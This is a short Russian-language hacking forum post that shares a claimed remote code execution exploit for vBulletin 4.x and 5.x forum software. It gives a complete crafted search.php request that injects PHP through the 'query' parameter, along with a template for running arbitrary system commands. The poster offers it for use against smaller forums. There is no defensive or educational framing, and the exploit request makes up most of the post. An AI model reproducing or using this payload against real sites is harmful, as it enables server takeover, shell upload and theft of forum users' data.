07.03.2014, 12:45
|
|
Познающий
Регистрация: 10.01.2013
Сообщений: 36
С нами:
7019606
Репутация:
-5
|
|
На топовый форумах конечно не работает, но на школофорумах вполне. Инфа была слита давно, но тут не было!
[Информация]
-Уязвимые версии: vBulletin v4.x.x and 5.х.x
-Цена на офф. сайте: 7000$ (~245000 рублей)
-Распространенность на 02.03.2014: 5/5
-Платформа: PHP
-Возможности: Shell Upload / Remote Code Execute
[Продаваемая уязвимость]
Код:
search.php?ajax=0&beforeafter=after&childforums=1&exactname=1&exclude=&forumchoice=&nocache=0&query= %24%7b%40system('pwd')%7d&quicksearch=0&replyless=0&replylimit=0&saveprefs=1&searchdate=0&searchthre adid=0&searchtype=1&searchuser=1&showposts=0&sortby=rank&sortorder=descending&starteronly=0&tag=17&t itleonly=0&userid=0
# "query" param
# php code to inject : ${@system('put command here')}
ВАЖНО, для того что-бы юзать данный шел нужно иметь знания по PHP |
|
|